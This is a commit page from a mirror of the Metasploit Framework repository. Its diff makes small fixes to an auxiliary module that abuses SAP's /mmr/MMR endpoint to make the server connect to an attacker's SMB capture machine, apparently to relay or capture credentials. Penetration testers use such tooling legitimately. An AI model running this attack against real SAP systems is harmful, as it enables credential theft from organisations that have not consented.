infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do final cleanup for sap_smb_relay

unstable
jvazquez-r7 2013-05-16 14:25:10 -05:00
parent 9dd582c526
commit d9bdf3d52e
1 changed files with 7 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/auxiliary/scanner/sap/sap_smb_relay.rb
View File

@ -108,7 +108,7 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code == 200 and res.body =~ /XML for Analysis Provider/ and res.body =~ /Request transfered is not a valid XML/ if res and res.code == 200 and res.body =~ /XML for Analysis Provider/ and res.body =~ /Request transfered is not a valid XML/
print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine") print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine")
else else
vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}") vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}") if res
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Unable to connect") print_error("#{rhost}:#{rport} - Unable to connect")
@ -124,7 +124,7 @@ class Metasploit4 < Msf::Auxiliary
vprint_status("#{rhost}:#{rport} - Sending unauthenticated request for #{smb_uri}") vprint_status("#{rhost}:#{rport} - Sending unauthenticated request for #{smb_uri}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/mmr/MMR', 'uri' => '/mmr/MMR',
'method' => 'GET', 'method' => 'HEAD',
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'vars_get' => { 'vars_get' => {
@ -135,7 +135,7 @@ class Metasploit4 < Msf::Auxiliary
}) })
else else
vprint_status("#{rhost}:#{rport} - Sending unauthenticated request for #{smb_uri}") vprint_status("#{rhost}:#{rport} - Sending authenticated request for #{smb_uri}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/mmr/MMR', 'uri' => '/mmr/MMR',
'method' => 'GET', 'method' => 'GET',
@ -182,8 +182,10 @@ class Metasploit4 < Msf::Auxiliary
'sap-language' => 'EN' 'sap-language' => 'EN'
} }
}) })
if res if res and res.code == 500 and res.body =~ /OPEN_FAILURE/
vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}") print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine")
else
vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}") if res
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Unable to connect") print_error("#{rhost}:#{rport} - Unable to connect")